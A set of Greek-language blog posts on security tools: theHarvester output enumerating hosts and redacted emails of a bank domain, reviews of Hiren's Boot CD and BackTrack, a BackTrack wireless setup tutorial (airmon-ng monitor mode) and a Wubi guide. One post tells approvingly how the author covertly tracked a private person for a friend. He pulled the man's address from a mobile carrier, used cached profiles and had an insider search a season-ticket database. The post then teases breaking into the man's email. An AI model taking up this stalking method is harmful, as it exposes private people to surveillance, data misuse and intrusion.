    Σε αυτή την περίπτωση συνεχίζουμε την αναζήτηση και στις υπόλοιπες μηχανές αναζήτησης για περισσότερα αποτελέσματα. Στο παραπάνω θα παρατηρήσετε ότι μου έφερε μόνο domains/subdomains και όχι emails. Για αυτό όποιος ψάχνει κάτι ίσως το βρει σε άλλη μηχανή αναζήτησης. Όπως μπορείτε να δείτε και λίγο πιο κάτω μία δοκιμή που φέρνει και emails.
    01
    root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d 53.com -l 500 -b google
    02
    03
    *************************************
    04
    *TheHarvester Ver. 1.4b *
    05
    *Coded by Christian Martorella *
    06
    *Edge-Security Research *
    07
    *[email protected] *
    08
    *************************************
    09
    10
    Searching for 53.com in google :
    11
    ======================================
    12
    13
    Limit: 500
    14
    Searching results: 0
    15
    Searching results: 100
    16
    Searching results: 200
    17
    Searching results: 300
    18
    Searching results: 400
    19
    20
    Accounts found:
    21
    ====================
    22
    23
    [email protected]
    24
    @53.com
    25
    [email protected]
    26
    @.53.com
    27
    [email protected]
    28
    [email protected]
    29
    [email protected]
    30
    [email protected]
    31
    [email protected]
    32
    [email protected]
    33
    [email protected]
    34
    [email protected]
    35
    ====================
    36
    37
    Total results: 12
    38
    39
    Hosts found:
    40
    ====================
    41
    42
    www.53.com
    43
    reo.53.com
    44
    direct.53.com
    45
    premierissue.53.com
    46
    retire.53.com
    47
    ir.53.com
    48
    tdsc.53.com
    49
    secure.53.com
    50
    ra.53.com
    51
    2Fwww.53.com
    52
    Www.53.com
    53
    252Fwww.53.com
    54
    espanol.53.com
    55
    employee.53.com
    56
    bnjhz.php?...53.com
    57
    express.53.com
    58
    www.ra.53.com
    59
    Ra.53.com
    60
    3Dreo.53.com
    61
    wwww.53.com
    62
    Retire.53.com
    63
    @.53.com
    64
    www.express.53.com
    65
    mxism.php?...53.com
    66
    pngyo.php?...53.com
    Αρκετά ενδιαφέρον, για κάποιον που ασχολείται με την συλλογή πληροφοριών. Τι λέτε;
    http://www.edge-security.com/theHarvester.php
    Open Source σημαίνει… -> http://www.edge-security.com/soft/theHarvester.py
  19. Blackman
    Πρόσφατα με έσωσε από πολλούς μπελάδες στον προσωπικό μου υπολογιστή, αλλά και μου έδωσε λύσεις σε κάποιες άλλες περιπτώσεις. Εγώ είχα την τύχη να το πάρω original από ένα φίλο και από τότε έχω "ξεχάσει" να του το ξαναδώσω.



    Πρόκειται για μία συλλογή (γνωστών) εργαλείων που λύνουν τα χέρια. Την σχετική λίστα μπορείτε να την βρείτε από την σχετική σελίδα που έχουν οι τύποι που δημιούργησαν αυτό το CD.

    http://www.hiren.info/pages/bootcd

    Οι κατηγορίες που θα βρείτε είναι:



    Partition Tools


    Backup Tools


    Recovery Tools


    Testing Tools


    RAM (Memory) Testing Tools


    Hard Disk Tools


    System Information Tools


    MBR (Master Boot Record) Tools


    BIOS / CMOS Tools


    MultiMedia Tools


    Password Tools


    NTFS (FileSystems) Tools


    Browsers / File Managers


    Other Tools


    Dos Tools


    Antivirus Tools


    Disk Clone Tools

     



    Προσωπικά, έχω χρησιμοποιήσει αρκετά από τα partition tools, τα MBR tools (που πραγματικά με έσωσαν), τα Password Tools (αυτό ήταν κάπως...έκανα clear password σε τοπικό administrator χρήστη των vista) και τα RAM Testing Tools (όπου ανακάλυψα ότι η μνήμη του συστήματος μου είχε πρόβλημα). Τα υπόλοιπα είναι υπό παρακολούθηση.

    Τέλος να αναφέρω, ότι πέραν αυτών το CD έχει και μία Boot έκδοση των Windows XP με πολύ λίγα πράγματα να φορτώνει και με το όνομα Windows Mini XP.

    Θα πρότεινα να το βρείτε άμεσα.

    Υ.Γ. το "που να μην το χρειαστείς ποτέ" στον τίτλο, αναφέρεται στο γεγονός ότι τις περισσότερες φορές που μπορεί να είναι χρήσιμο το εν λόγω εργαλείο είναι όταν έχεις πρόβλημα. Οπότε ευχόμεθα να μην έχουμε τέτοια προβλήματα.

    Στην αντίληψη μου έχει πέσει και το Falcon's Ultimate Boot CD (με vista boot), το οποίο δεν έχω στα χερία μου (τουλάχιστον ακόμα). Αν καταφέρω και το βρω, τότε θα ενημερώσω καταλλήλως.
  20. Blackman
    Χαμηλώστε τον φωτισμό...

    βάλτε την πιο 'χακεροκομπιουτερίστικη' διάθεση σας...το πονηρό κρυμένο χαμόγελο που έχετε...και ελάτε να μπούμε μαζί στον κόσμο του Backtrack.



    To backtrack είναι ένα Linux λειτουργικό σύστημα, βασισμένο στο Slackware και το οποίο είναι διαθέσιμο για χρήση άμεσα διότι μιλάμε για ένα λειτουργικό που τα έχει όλα εγκατεστημένα και είναι Live.



    To remote-exploit.org χαρακτηρίζει το Backtrack ως "BackTrack is the most top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes."

    Θέλετε κάτι άλλο από αυτό; Για να κάνετε ότι δοκιμές θέλετε, να τεστάρετε ότι θέλετε και να δοκιμάσετε τις γνώσεις σας όπου θέλετε;

    Α ναι...θέλετε και κάτι άλλο.Να σας δείξω τι καλούδια θα βρείτε μέσα.

    Ρίξτε μία ματιά στην φωτογραφία που ακολουθεί:



    Αυτή που βλέπετε είναι η τελευταία έκδοση του Backtrack (3) και είναι final.

    Αναλυτικά τα εργαλεία που υπάρχουν, με ανάλυση του τι είναι το καθένα μπορείτε να τα βρείτε ΕΔΩ (ΔΕΙΤΕ ΤΗΝ ΟΠΩΣ ΚΑΙ ΔΗΠΟΤΕ)

    Μιλάμε για 30 προγράμματα Information Gathering, 30 προγράμματα Network Mapping, 65 προγράμματα Valnerability Identification, 12 προγράμματα Penetration, 48 προγράμματα Privilege Escalation, 16 προγράμματα maintaining access, 25 προγράμματα για ασύρματα δίκτυα (WiFi - Radio Network Analysis), 22 προγράμματα για bluetooth (bluetooth - Radion Network Analysis), 7 προγράμματα VOIP & Telephony Analysis, 13 προγράμματα Digital Forensics, 7 προγράμματα Reverse Engineering και επίσης καμιά 15 προγράμματα που δεν είναι σε κάποια κατηγορία. (συνολικά 290+ προγράμματα)



    Φυσικά δεν χρειάζετε να αναφέρουμε, ότι είναι έτοιμο το σύστημα και στις υπόλοιπες κατηγορίες προγραμμάτων. Αφού θα βρείτε από το SKYPE, μέχρι OCR πρόγραμμα. Προσωπικά το θεωρώ καταπληκτικό σύστημα, καθότι απλά τα έχει όλα. Ως διαχειριστές συστημάτων, μπορείτε να κάνετε πολλές δοκιμές στο σύστημα σας και να δείτε πάρα μα πάρα πολλές πληροφορίες, εφόσον τα προγράμματα που έχει καλύπτουν όλο το φάσμα λειτουργιών μίας εταιρείας ασχέτως του λειτουργικού, τοπολογίας ή όποιας πολυπλoκότητας.

    ΚΑΤΕΒΑΣΤΕ ΤΟ BACKTRACK ΤΩΡΑ!!!! (EINAI ...IT PRO MUST HAVE)

    USB version & VMWare version

    μπορείτε να το τρέξετε είτε ως Live CD, αλλά είτε να το κάνετε εγκατάσταση από το σχετικό κουμπί που έχει για αυτό τον σκοπό μέσα στο λειτουργικό.

    Για τον τρόπο χρήσης του κάθε προγράμματος θα πρέπει να ψάξετε λίγο στο internet (πιστέψτε με, για το κάθε ένα υπάρχει αναλυτικός οδηγός χρήσης), από εκεί και πέρα, λίγο χρόνο να βρείτε και όρεξη για να "παίξετε" με το Backtrack και σίγουρα θα γίνετε και εσείς ένας από τους φανατικούς οπαδούς του (στους χιλιάδες που υπάρχουν ήδη).

    http://securitydistro.com/gallery/100/BackTrack-3-Final-Screenshots.php

    http://www.offensive-security.com/ (BackTrack's official site)

    Back to back...following your track...I'm using...Linux Backtrack!

    Don't you try...and don't deny...cause Backtrack will make you cry.
  21. Blackman
    Ένας φίλος ήρθε μία μέρα και μου ζήτησε μία χάρη. Ήθελε να βρει έναν τύπο στο Internet και δεν ήθελε να ξέρει εκείνος ότι τον αναζητά. Οι λόγοι προσωπικοί, αλλά είναι ενδιαφέρον το πως μπορεί κάποιος να συλλέξει πληροφορίες και να πάρει μαθήματα από κάτι τέτοιο.
    Ας ξεκινήσουμε με τα δεδομένα σαν μία μαθηματική άσκηση.
    Τα δεδομένα:
    Ξέραμε το όνομα του “Νίκος”, το κινητό του και ένα “φίλο” του.
    ΦΑΣΗ 1η
    Η πρώτη φάση για να βρούμε τις πληροφορίες που ζητούσαμε για τον Νίκο, ήταν αρχικά το να προσπαθήσουμε να επικοινωνήσουμε με τον φίλο του μήπως εκείνος μπορούσε να μας δώσει κάποιες από τις πληροφορίες που ο δικός μου φίλος ήθελε. Παρόλες τις προσπάθειες όμως αυτό δεν έγινε, καθώς από ότι φάνηκε ο φίλος του οποίου είχαμε το τηλέφωνο, είχε εξαφανιστεί και είχε αλλάξει προφανώς και νούμερο.
    Δεν πτοηθήκαμε, αφού δεν μπορούσαμε να τον βρούμε σε φυσικό επίπεδο, επιχειρήσαμε να επικοινωνήσουμε σε επίπεδο διαδικτύου. Δυστυχώς πέσαμε πάλι σε τοίχο, καθώς το profile του στο Facebook δεν υπήρχε πλέον. (χμ… μυστήρια πράγματα ε; )
    Υπήρχε η λύση να βρούμε φίλο του φίλου, αλλά τότε περιπλέκαμε το θέμα και το ζητούμενο του φίλου μου με όνομα Γιάννης ήταν να μην ξέρει ο Νίκος ότι κάποιος ασχολείται και αναζητάει πληροφορίες για τον ίδιο.
    Αφήνουμε αυτό εκτός και προχωράμε στο επόμενο βήμα…
    Χμ, το τηλέφωνο του. Με το να καλέσουμε δεν θα καταφέρναμε τίποτα και ο Γιάννης το είχε διαγράψει αυτό το σενάριο. Ας κάνουμε μία κλήση στις εταιρείες κινητής να δούμε τι θα μας δώσουν.
    BINGO! Στην πρώτη εταιρεία που καλέσαμε μπόρεσαν να μας δώσουν άμεσα στοιχεία καθώς ο αριθμός δεν ήταν απόρρητός. Έτσι αποκτήσαμε επιπλέον το επίθετο, και την πλήρης διεύθυνση του.
    ΦΑΣΗ 2η
    Εφόσον έχουμε πλέον πλήρες ονοματεπώνυμο ξεκινάμε μία απλή αναζήτηση στο Google, για να βρούμε αν υπάρχει κάπου η φάτσα του τύπου. Ο Γιάννης δεν τον ήξερε ούτε φυσιογνωμικά τον τύπο και έπρεπε να ξέρει ποιος είναι ακριβώς όταν χρειαστεί να έρθουν σε επαφή. (χμ, παράξενο και αυτό ε; )
    Στην αναζήτηση βρίσκουμε ένα profile στο Facebook & ένα profile στο Badoo. Τα υπόλοιπα που βρήκαμε ήταν από άτομα που μένουν στην Αμερική, οπότε τα αποκλείσαμε άμεσα. Στο Facebook όμως το profile είχε διαγραφεί και δεν ήμασταν σίγουροι ότι ήταν αυτό το profile. Στο Badoo όμως είχε 1-2 φωτογραφίες δικές του καθώς και του σκύλου του.
    Στην αναζήτηση για να επιβεβαιώσουμε ότι είναι αυτός, ξαναπήγαμε στο google και στο αποτέλεσμα του facebook, αντί να μπούμε μέσα επιλέξαμε να μας φέρει ότι είναι Cached από την μηχανή αναζήτησης.

    Και τσουπ… μας φέρνει ένα Profile που ναι μεν δεν έχουμε πρόσβαση, αλλά φαίνονται κάποια πράγματα (όχι η φώτο του), αλλά ότι είναι πχ φίλαθλος μίας μεγάλης ομάδας (από τα groups που έχει κάνει join), καθώς και 1-2 groups που έχουν σχέση με σκυλιά και ζώα. Σε ένα από αυτά είναι η φωτογραφία του σκύλου που βρήκαμε στο profile στο Badoo. Οπότε παρόλο που πλέον το Profile στο facebook έχει διαγραφεί, η φώτο μέσα στο group υπάρχει καθώς επίσης και σε συνδυασμό με το open profile στο άλλο social media επιβεβαιώνουμε ότι αυτός είναι ο άνθρωπος που ψάχνουμε.
    Δίνω τα στοιχεία στον φίλο μου, αλλά εκείνος δεν είναι ικανοποιημένος. Θέλει να βρει το email του και γενικότερα κάποιο τρόπο να μπει είτε στο email του ή στον υπολογιστή του. Τον προειδοποιώ ότι αυτό που ζητάει ξεπερνάει τα όρια της νομιμότητας. Μου απαντάει ότι παίρνει εκείνος κάθε ευθύνη και αν δεν το κάνω εγώ τουλάχιστον να τον βοηθήσω να ακολουθήσει μία πρακτική. Μου είπε επίσης ότι στο τέλος θα μου εξηγήσει περισσότερα για την όλη ιστορία. (για να δούμε)
    ΦΑΣΗ 3η
    Πριν προχωρήσουμε σε οτιδήποτε θα ήταν αντιδεοντολογικό σκεφτήκαμε μήπως τον ψαρώσουμε μέσω του Badoo με κάποιο μήνυμα που θα του έστελνε κάποια κοπέλα (αφού για κάτι τέτοιο ήταν εκεί μέσα). Καθώς το εν λόγο μέσω έχει μία ενδιαφέρουσα αναφορά για κάθε μέλος του για να ξέρεις πόσο συχνά επισκέπτεται το profile του.

    Τελικά την ιδέα αυτή την αφήσαμε γιατί δεν ξέραμε πότε θα μπορούσε να απαντήσει και ο φίλος μου ήθελε να κάνουμε όσο πιο γρήγορα μπορούσαμε. Έπρεπε να βρούμε το email του…έτσι θα είχαμε περισσότερες πιθανότητες να πετύχουμε κάτι.
    Λίγες ημέρες μετά τυχαίνει και συζητάω με ένα άλλο φίλο μου στο Facebook για το όλο θέμα. Ο φίλος μου ο Άκης μου λέει ότι ξέρει τον φίλο του Νίκου που ψάχναμε και ότι τον είχε φίλο στο facebook. Καταλαβαίνει όμως και αυτός ότι ο φίλος αυτός είχε διαγράψει το profile του επίσης, κάτι που είχαμε ήδη δει εμείς από την πρώτη στιγμή. Όμως εκεί μου αναφέρει ότι έχει φίλο και τον αδερφό του. Χμ, ενδιαφέρον…
    Του ζητάω να κοιτάξει λίγο τους φίλους του για εμένα και να μου πει αν βρει είτε το Νίκο, είτε τον αδερφό του παιδιού. Παρόλο που ο Άκης έκατσε και κοιτούσε αρκετή ώρα, δεν βρήκε τίποτα και αυτό έκανε το πράγματα ακόμα πιο περίεργο… ώσπου κάποια στιγμή μου λέει…
    “είναι ένας τύπος στους φίλους του που λέγεται Nick (ομάδα) καθώς και άλλος ένας που λέγεται Bill Ill (το όνομα του φίλου του Νίκου ήταν Βασίλης και το Ill ήταν το πρώτο συνθετικό του επιθέτου του)” BINGO! Για ακόμα μία φορά, καθώς φαίνεται ότι τόσο ο Νίκος όσο και ο φίλος του έχουν κάνει νέα Profiles.

    Ο Nick (Ομάδα) λοιπόν, δεν έχει κλειδωμένο τελείως το profile του. Ρίχνω μία ματιά και βλέπω πότε το δημιούργησε (ήταν λίγες ημέρες πριν ο φίλος μου μου ζητήσει να βρούμε στοιχεία για αυτόν) και για τις επόμενες 2 εβδομάδες ότι post έκανε ήταν Public. Επίσης είχε public και όλες του τις φωτογραφίες. Email όμως δεν φαινόταν πουθενά.
    Σκέφτομαι λίγο τι εναλλακτικές έχω και προχωράει στην επόμενη κίνηση. Επικοινωνώ με ένα γνωστό μου που ξέρω ότι έχει πρόσβαση στην βάση δεδομένων των κατόχων διαρκείας της ομάδας αυτής, μήπως και βρούμε κάτι. Του δίνω όλα τα στοιχεία…
    Η απάντηση που πήρα λίγη ώρα μετά ήταν ότι δεν υπάρχει κανένας με αυτό το όνομα στην λίστα των τελευταίων ετών με διαρκείας… (τζίφος; ), αλλά υπάρχει άλλο άτομο με δηλωμένη την ίδια ακριβώς διεύθυνση κατοικίας (!!!!). Μπορείτε να καταλάβετε ότι ήταν ο φίλος του Νίκου, ο Βασίλης, με τον οποίο φαίνεται ότι ήταν συγκάτοικοι. Έτσι αποκτήσαμε το email του Βασίλη.
    End of part 1 – Συμπεράσματα
    Στο σημείο αυτό σταματάω την ιστορία, όπου έχει το μεγαλύτερο μέρος του information gathering. Στην όλη αναζήτηση χρησιμοποίησα και προγράμματα όπως το Maltego, για να με βοηθήσουν στην όλη διαδικασία, αλλά δεν μου έδωσαν κάτι παραπάνω από ότι μία απλή αναζήτηση στο Google…
    Ξεκινήσαμε με τα εξής δεδομένα:
    Όνομα: γνωστό
    Επίθετο: άγνωστο
    Ηλικία: άγνωστο
    Φωτογραφία: άγνωστο
    Social Media: deleted
    Email: άγνωστο
    Διεύθυνση: άγνωστο
    Λοιπά στοιχεία: άγνωστο
    και καταλήξαμε με τα παραπάνω να ξέρουμε
    Όνομα: γνωστό
    Επίθετο: γνωστό
    Ηλικία: γνωστό
    Φωτογραφία: γνωστό
    Social Media: γνωστό
    Email: φίλου/συγκάτοικου
    Διεύθυνση: γνωστό
    Λοιπά στοιχεία: ομάδα/χόμπυ
    Μέχρι αυτό το σημείο βγαίνουν κάποια εύκολα συμπεράσματα…
    1) Πολλοί χρησιμοποιούν το ονοματεπώνυμο τους σε διάφορες σελίδες και αυτό κάνει πιο εύκολο τον εντοπισμό τους με απλή αναζήτηση στου Google
    2) Ακόμα και να διαγραφεί κάτι, η μηχανή αναζήτησης κρατάει στην cache την τελευταία εικόνα πριν την διαγραφή (αν η αναζήτηση γίνει σχετικά κοντά στην ημερομηνία της διαγραφής)
    3) Αν δεν δηλώσετε τον αριθμό σας ως απόρρητο στην εταιρεία κινητής, τότε από αυτό ο οποιοσδήποτε έχει πρόσβαση και στα υπόλοιπα στοιχεία σας (όπως η διεύθυνση του κατοικίας)
    4) Εσείς μπορεί να έχετε κλειδωμένο το profile σας σε κάποιο Social Media, αλλά οι φίλοι σας που έχουν πρόσβαση στο δικό σας;
    5) Η χρήση των Social Media όπως το Facebook δίχνει περισσότερα για εμάς από ότι θα θέλαμε οι άλλοι να ξέρουν για μας.
    6) Φροντίστε σε οποιαδήποτε υπηρεσία, εταιρεία δίνετε τα στοιχεία σας, αυτά να είναι απόρρητα και να μην μπορούν να δοθούν σε οποιονδήποτε το ζητήσει.

     
    what follows to part 2?
    Το επόμενο μέρος είναι το πως καταφέραμε και αποκτήσαμε πρόσβαση και που…
    και τελικά τι μου αποκάλυψε ο Γιάννης μόλις φτάσαμε σε κάποιο κρίσιμο σημείο.
    stay tuned…
  22. Blackman
    Δεν έκανα λάθος. Δεν είναι η ταινία Back to the Future. Είναι η πραγματικότητα "Back to the Track". Το είχαμε αναφέρει σε αυτό το Blog στο παρελθόν. Ένα εργαλείο που αξίζει να ασχοληθούν όσοι έχουν την όρεξη καθώς οι πληροφορίες που μπορεί κάποιος να αντλήσει είναι πολλές και ενδιαφέρουσες.

    Το Backtrack 3, όπως κάθε σωστή διανομή ή λειτουργικό σύστημα που σέβεται τον εαυτό του, κάνει τον κύκλο του, "πεθαίνει" και "ξαναζεί".



    Το Backtrack 4 Pre-Final ήρθε και σε λίγο καιρό έρχεται και η τελική έκδοση του συστήματος. Προσωπικά δουλεύω την beta λίγο καιρό τώρα (δεν έχω δει την Pre-Final ακόμα). Τα περισσότερα εργαλεία που εμπεριέχονται έχουν αναβαθμιστεί στις τελευταίες εκδόσεις και αναμένεται το ίδιο να ισχύει και στην τελική έκδοση. Υπάρχουν κάποια θεματάκια ακόμα, όπως κάποιο debugging που πρέπει να γίνει πχ στο 0trace για να δουλέψει σωστά, αλλά η κοινότητα του Backtrack είναι εδώ για να βοηθήσει και σίγουρα η final version θα δουλεύει απροβλημάτιστα. Όσοι έχουν δουλέψει με την προηγούμενη έκδοση, να είναι έτοιμοι για καλύτερα αποτελέσματα σε όλες τις δοκιμές ή μετρήσεις που θα κάνουν.



    Αν και η αλήθεια είναι ότι λίγοι έχουν την σωστή εικόνα του Backtrack και πολλοί το διαφημίζουν ως εργαλείο για σπάσιμο ασύρματων δικτύων, που ουσιαστικά και αυτό είναι κάτι που μπορεί να γίνει από οπουδήποτε, λόγο ότι χρησιμοποιεί το aircrack. Ένας σωστός penetration tester ή security specialist πρέπει να το έχει από κοντά.

    Κατεβάστε το

    ISO (Pre-Final)

    VM (beta)

    BackTrack 4 - The Definitive Guide

    coming soon...


  23. Blackman
    Αρχικά να αναφέρουμε ότι το backtrack μπορείτε να το χρησιμοποιήσετε τόσο σαν Live CD ή να δημιουργήσετε ένα Live USB, είτε να το κάνετε εγκατάσταση σε κάποιον υπολογιστή ή laptop, αλλά ακόμα να κατεβάσετε έτοιμο και ένα VMware virtual machine. Όλα αυτά είναι διαθέσιμα στην σελίδα http://www.backtrack-linux.org/downloads/ από όπου μπορείτε να κατεβάσετε αυτό που σας βολεύει καλύτερα.
    Που είναι το δίκτυο μου; Οεο;
    Ένα από τα χαρακτηριστικά που έχει η νέα έκδοση του backtrack είναι ότι το networking του είναι ανενεργό, σαν μία σωστή security πλατφόρμα που σέβεται τον εαυτό της. Αυτός είναι και ο κύριος λόγος που πάρα πολύ κόσμος που δεν είναι εξοικειωμένος με Linux συστήματα το παρατάει όπως το έπιασε. Γιατί πολύ απλά είναι σαν να έχουν ένα αυτοκίνητο και να μην ξέρουν πώς να το ‘βάλουν εμπρός’.
    Στις παλαιότερες εκδόσεις μέχρι και την έκδοση 3, από το networking η κάρτα Ethernet (eth0) ήταν ρυθμισμένη τόσο στο VMware image όσο και στα Live να είναι up and running αυτόματα. Στην νέα έκδοση όμως, παρατήρησα ότι κανένα Interface δεν είναι UP. Στην περίπτωση της ασύρματης κάρτας είναι by default σε κατάσταση monitoring.
    Ethernet & Wireless
    Προσωπικά πιστεύω ότι η συγκεκριμένη διανομή είναι φτιαγμένη για να δουλεύει σε Laptop, γιατί έχει πολύ όμορφα πράγματα για να κάνεις με την ασύρματη κάρτα δικτύου. Στο παρελθόν θα είχατε διαβάσει σχετικές αναφορές πάνω σε αυτό και γενικότερα στο backtrack στα παρακάτω blog posts μου
    http://autoexec.gr/blogs/blackman/archive/2008/11/28/back-to-back-following-your-track-i-m-using-linux-backtrack.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/11/30/hack-my-it-pro-connections.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/07/05/wifi-cracking.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/07/07/back-to-the-track-4.aspx
    Να θυμάστε ότι αν η κάρτα σας δεν έχει chipset της atheros, τότε έχετε μία κάρτα που δεν μπορεί να κάνει ούτε Monitoring ούτε να στείλει πακέτα, συνεπώς no wifi cracking for you. Όπως και να έχει πάντως αν δεν είναι atheros, θα αναγκαστείτε να την χρησιμοποιήσετε όπως κάνατε μέχρι τώρα.
    ΟΚ. Δεν θέλετε να κάνετε wifi sniffing, ούτε wifi cracking, τίποτα από αυτά. Θέλετε απλά να συνδεθείτε ασύρματα σε κάποιο access point, προφανώς για να έχετε ασύρματο internet και να χρησιμοποιήσετε τα υπόλοιπα όμορφα εργαλεία που υπάρχουν.
    Στον κόσμο της Microsoft έχετε μάθει την εντολή ipconfig και την εντολη route. Στον κόσμο του Linux όμως υπάρχουν οι εξής (και δεν είναι οι μόνες)
    ip
    http://linux-ip.net/gl/ip-cref/
    http://linux.about.com/library/cmd/blcmdl8_ip.htm
    http://www.cyberciti.biz/faq/howto-linux-configuring-default-route-with-ipcommand/
    ifconfig
    http://en.wikipedia.org/wiki/Ifconfig
    http://linux.die.net/man/8/ifconfig
    iwconfig
    http://gd.tuwien.ac.at/linuxcommand.org/man_pages/iwconfig8.html
    http://www.susegeek.com/wireless/iwconfig-wireless-interface-configuration-utility-in-linux/
    Αρχικά τρέχοντας την εντολή ip add θα δείτε κάτι παρόμοιο με αυτό

    Στην περίπτωση μου δεν βλέπετε την ασύρματη κάρτα δικτύου (συνήθως wlan0 ή wifi0) λόγω του ότι πρέπει να ρυθμιστεί σχετικά το WMware workstation. Αν δεν γίνει κατανοητό θα φροντίσω να βάλω print screens από το Laptop που έχω κανονική εγκατάσταση.
    Συνεχίζοντας στο θέμα μας, θα παρατηρήσετε ότι η eth0 είναι DOWN, αντίστοιχα παίζει να βλέπετε και την ασύρματη κάρτα. Ο τρόπος με τον οποίο ‘σηκώνουμε’ κάποιο Interface είναι με την εντολή ifconfig <όνομα Interface> up
    Οπότε η όλη εικόνα που θα έχετε θα είναι κάπως έτσι

    Στην περίπτωση του Ethernet βλέπετε ότι το state είναι UNKNOWN ενώ από κάτω δεν μας έχει φέρει κάποια άλλη πληροφορία. Ο λόγος είναι γιατί απλά δεν έχει πάρει IP.
    Εκεί τρέχουμε την εντολή dhclient για να αναζητήσει διεύθυνση από κάποιον dhcp. Οπότε θα δείτε κάτι σαν το παρακάτω

    Και εκτελώντας πάλι ip add βλέπουμε ότι η κάρτα μας έχει πλέον και διεύθυνση. Οπότε επιβεβαιώνουμε ότι έχουμε σύνδεση.

    Το παραπάνω φυσικά ισχύει τόσο αν το Interface είναι της LAN κάρτας μας, αλλά και για την wireless (θα δούμε παρακάτω πως συνδέεται αρχικά πάνω σε κάποιο access point).
    Η διαφορά όμως με την Wireless για να γίνουν όλα τα παραπάνω είναι ότι ΔΕΝ ΠΡΕΠΕΙ ΝΑ ΕΙΝΑΙ ΣΕ ΚΑΤΑΣΤΑΣΗ MONITORING (που αναφέραμε ότι είναι από default).
    Αυτό το πράγμα είναι απλό και γίνεται με την εντολή airmon-ng (που είναι μέσα στο πακέτο του aircrack-ng).
    Βάζουμε την κάρτα σε monitor mode με την εντολή airmon-ng start <όνομα wireless interface>

    Ενώ αντίστοιχα την βγάζουμε από Monitor Mode με airmon-ng stop <όνομα wireless interface>

    Σε περίπτωση που αντιμετωπίσετε προβλήματα με τα πρώτα βήματα στην ασύρματη κάρτα, πηγαίνετε και σταματήστε monitor mode αν δεν το έχετε κάνει ήδη.
    Θα μου πείτε τώρα
    -Τι μας λες ρε Blackman; ΟΚ την LAN κάρτα την ανεβάσαμε και πήρε και dhcp, κάτι δεν κολλάει όμως με την Wireless. Πως βρίσκω και πως συνδέομαι σε κάποιο access point; Τι dhclient εντολές μας λες; Αφού δεν έχουμε συνδεθεί κάπου.
    Εντάξει. Εφόσον έχετε βεβαιωθεί ότι η κάρτα wifi δεν είναι σε monitor mode και είναι UP τότε εκτελούμε την εντολή iwconfig

    Όπου βλέπουμε την κάρτα μας. Με αυτή την εντολή μπορούμε να συνδεθούμε εκεί που θέλουμε και γενικότερα να διαχειριστούμε την κάρτα μας, αλλά μάλλον προτιμάτε κάτι καλύτερο από αυτό.
    Στο backtrack θα βρείτε και ένα πιο φιλικό Wired & Wireless Connection Manager. Δεν έχετε να κάνετε κάτι περισσότερο από το να τρέξετε wicd start και είτε πηγαίνετε στα settings να τρέξετε το Connection Manager που πλέον έχει εμφανιστεί, ή αμέσως εκτελείτε wicd-client start (αν δεν τρέχετε το πρώτο, δεν θα εκτελεστεί το δεύτερο).

    Οπότε πλέον εμφανίζεται κάτι πιο γνώριμο…

    Οι οθονούλες του networking
    Μέσω του οποίου μπορούμε να ρυθμίσουμε τόσο την wired όσο και την wireless κάρτα μας.

    Φυσικά με το παραπάνω καλύπτεστε και στο θέμα των static ips, καθώς μέσα από τα advanced settings μπορείτε να τα ρυθμίσετε

    Γνωρίζοντας τα παραπάνω νομίζω ότι πλέον, όσοι είχαν εκνευριστεί και παρατήσει το backtrack, είναι ευκαιρία να το ξαναπιάσουν. Ετοιμάστε το για να δοκιμάσετε ότι άλλα θα πούμε σε αυτή την σειρά blog posts για το backtrack.
    Ελπίζω το συγκεκριμένο να βοηθάει όσους αντιμετώπισαν προβλήματα στο παρελθόν με το συγκεκριμένο θέμα. Stay tuned…
    back|track 4 …make it real…

  24. Blackman
    Τι θα λέγατε αν σας έλεγα ότι υπάρχει τρόπος να κάνετε εγκατάσταση Ubuntu Linux ΜΕΣΑ στα Windows;
     
    Εγκατάσταση λειτουργικού μέσα σε άλλο λειτουργικό; Πως;
    Με την χρήση του Wubi.
     
    To Wubi είναι ένας βολικός και εύκολος τρόπος για τους χρήστες των Microsoft Windows να δοκιμάσουν το Linux.
    Έτσι χρήστες με όχι πολλές γνώσεις, μπορούν με αυτό τον τρόπο να εξερευνήσουν το Ubuntu χωρίς ιδιαίτερο κόπο.
     
    Υπέρ:

    Εγκατάσταση όπως οποιουδήποτε άλλου προγράμματος Δεν χρειάζονται αλλαγές στα partitions Free για να το κατεβάσεις & χωρίς άδειες χρήσης Κατά:

    Το Downloading μπορεί να αργήσει λίγο Από default το Wubi δεν κατεβάζει τις τελευταίες εκδόσεις του Linux συστήματος Η εγκατάσταση του Linux συστήματος γίνετε σαν ένα αρχείο με αποτέλεσμα να υπάρχει μειωμένη απόδοση Βήματα - παρατηρήσεις

    Απλή εγκατάσταση στα Windows Το κατεβάζεις και το εκτελείς με απλό διπλό κλικ Το Wubi κατεβάζει και εγκαθιστά το Ubuntu και το εγκαθιστά σαν δεύτερη επιλογή κατά το boot Τα αρχεία του Linux σώζονται σε ένα αρχείο των Windows Μετά την πρώτη εγκατάσταση το λειτουργικό κάνει επανεκκίνηση και επιλέγει το Ubuntu για να ξεκινήσει Μετά από αυτό το σύστημα ολοκληρώνει την εγκατάσταση, εφόσον ο χρήστης απαντήσει σε κάποιες ερωτήσεις για την παραμετροποίηση του αρχικού λογαριασμού Ο χρήστης πλέον επιλέγει λειτουργικό όταν ξεκινάει το σύστημα Πέραν του συστήματος αρχείων, το Linux δουλεύει κανονικά και όχι ως εξομοίωση Μπορεί να το δουλέψει πλήρες και να κάνει ότι εγκατάσταση θέλει free προγραμμάτων μέσα από το το Synaptic (αντίστοιχο του add/remove programs) Εγκατάσταση 

    Κατεβάστε το πρόγραμμα από το wubi-installer.org
    Κατεβάστε το αρχείο σε ένα φάκελο Διπλό κλικ για να ξεκινήσει η εγκατάσταση
    Βάλτε username & password Κάντε επανεκκίνηση και περιμένετε να ολοκληρωθεί η εγκατάσταση από το Ubuntu Κάντε επανεκκίνηση και επιλέξτε το Ubuntu
    Ή διαλέξτε τα Windows με τον ίδιο τρόπο
    Σε περίπτωση που θέλετε να κάνετε απεγκατάσταση του Ubuntu, γίνετε όπως όλα τα υπόλοιπα προγράμματα μέσω του Add or Remove Programms Για τους χρήστες που είναι καινούριοι στον κόσμο του Linux, αυτός είναι ένας πολύ εύκολος τρόπος για να έρθουν σε επαφή χωρίς να μπλέκουν με partitions που για το linux είναι διαφορετικού τύπου (ext2, ext3 κλπ) και όχι fat ή ntfs.
     
